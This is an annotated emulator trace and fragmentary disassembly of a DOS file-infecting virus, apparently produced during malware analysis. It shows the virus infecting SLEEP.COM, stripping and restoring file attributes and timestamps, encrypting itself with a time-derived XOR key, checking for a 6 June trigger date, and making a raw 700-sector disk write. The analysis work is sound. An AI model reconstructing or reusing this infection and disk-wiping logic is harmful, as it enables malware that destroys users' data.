0x12a6d: mov al, 3                          ; as an INT 26h drive number 3 would be D: (0 = A:)
0x12a6f: mov cx, 0x2bc                      ; 0x2bc = 700
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61                       ; 0x22a61 - 0x12a7e = 0xFFE3, i.e. -0x1D as a signed 16-bit displacement: the real target is 0x12a61 (the INT 26h path above), printed without 16-bit wrap
0x12a7e: ret
; XOR transform loop body: read a byte from [si], XOR it with the key in AH,
; store it to es:[di]. The loop control lies outside this excerpt.
0x12a7f: lodsb al, byte ptr [si]
0x12a80: xor al, ah
0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:38.71385429Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:38.717127222Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:38.721230018Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:38.731827199Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:38.740366467Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:38.746939913Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Annotated emulator trace: linear disassembly that starts at the return
; address of INT 21h "Get time" (Syscall Op 44 is AH = 0x2C printed in
; decimal), which returns DH = seconds and DL = hundredths. The trace rows that
; follow (attributes, close, open, writes, move pointer, file date/time,
; close, attributes) match the usual file-infector sequence: clear the
; attributes, reopen read/write, patch the file, then restore the timestamp
; and attributes so the change is less visible.
2018-12-25T12:39:38.753744735Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh
0x12c8a: je 0x12c84                         ; sum is zero -> go back (target precedes this excerpt; presumably re-reads the clock)
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]           ; si = 0x115 + word at [0x106] (presumably a load/delta offset)
0x12c93: mov byte ptr [si], dl              ; store the non-zero time-derived byte; NOTE(review): likely the per-infection XOR key -- confirm against the xor loop at 0x12a7f
0x12c95: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx                         ; CX = 0 clears every attribute bit (read-only, hidden, system)
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7                       ; DS:DX = path string at si + 0xc7
0x12ca0: int 0x21
0x12ca2: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file (handle in BX, set before this excerpt)
0x12ca4: int 0x21
0x12ca6: mov ax, 0x3d02                     ; INT 21h AH=3Dh, AL=02h: open for read/write
0x12ca9: int 0x21
0x12cab: jb 0x12c5e                         ; carry set = open failed
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax         ; save the returned handle (AX) at es:[dx + 0x63]
0x12cb3: xchg ax, bx                        ; BX = handle for the write that follows
0x12cb4: mov ah, 0x40                       ; INT 21h AH=40h: write; excerpt ends before the int 0x21
2018-12-25T12:39:38.756485359Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:39.08109746Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:39.083197338Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:39.090658432Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:39.093694589Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:39.10158071Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:39.104751579Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:39.108641907Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.110798834Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:39.11987336Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.122337629Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:39.124046988Z 62 PC: 12d0b | Close file
2018-12-25T12:39:39.132229297Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:39.143843964Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:39.146646853Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:39.154369022Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:39.160661371Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:39.16270978Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:39.173311464Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:39.182633029Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:39.189318531Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:39.192439213Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:39.19609375Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:39.198643851Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:39.205670095Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.208046765Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:39.22175668Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.223971724Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:39.239657766Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:39.247441472Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:39.257234737Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:39.260553236Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:39.267826983Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:39.274348012Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:39.277634199Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:39.287526677Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:39.28988839Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:39.297513046Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:39.300458053Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:39.3032362Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:39.306755551Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:39.307776605Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.309330252Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:39.315190968Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.316871477Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:39.31804196Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:39.323978359Z 67 PC: 12d1c | Get or set file attributes (See above)
; Annotated emulator trace: a 20-instruction linear disassembly that starts at
; the return address of INT 21h "Get date" (Syscall Op 42 is AH = 0x2A printed
; in decimal). Get date returns DH = month and DL = day, so `cmp dx, 0x606`
; tests for month 6, day 6. The next logged calls in this run are at
; 12d97/12d9e, which is consistent with the non-matching branch (0x12d8c)
; having been taken; the code at 0x12d21 reached on a match is not shown.
2018-12-25T12:39:39.330183324Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606
0x12b70: je 0x12b75                         ; date matched -> trampoline at 0x12b75
0x12b72: jmp 0x12d8c                        ; no match
0x12b75: jmp 0x12d21                        ; match path; target is outside this excerpt
; NOTE(review): 0x12b78-0x12b83 follow two unconditional jumps and look like
; data decoded as code by the linear sweep. The last two decodes (00 55 8B,
; then EC) contain 55 8B EC = `push bp; mov bp, sp`, so a routine probably
; begins at 0x12b81 -- confirm against the raw bytes.
0x12b78: and ah, bh
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl
0x12b83: in al, dx
0x12b84: sub sp, 0x2c                       ; reserve 0x2c bytes of stack locals
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a                       ; INT 21h AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]       ; DTA = the local buffer at bp - 0x2c
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e                       ; INT 21h AH=4Eh: find first file
0x12b93: mov cx, 0x10                       ; attribute mask 0x10 (directory bit)
0x12b96: mov dx, 0x1b5                      ; search pattern at 0x1b5 ...
0x12b99: add dx, word ptr [0x106]           ; ... plus the word at [0x106] (presumably a load/delta offset); excerpt ends before the int 0x21
2018-12-25T12:39:39.331716772Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:39.337938767Z 59 PC: 12d9e | Change current directory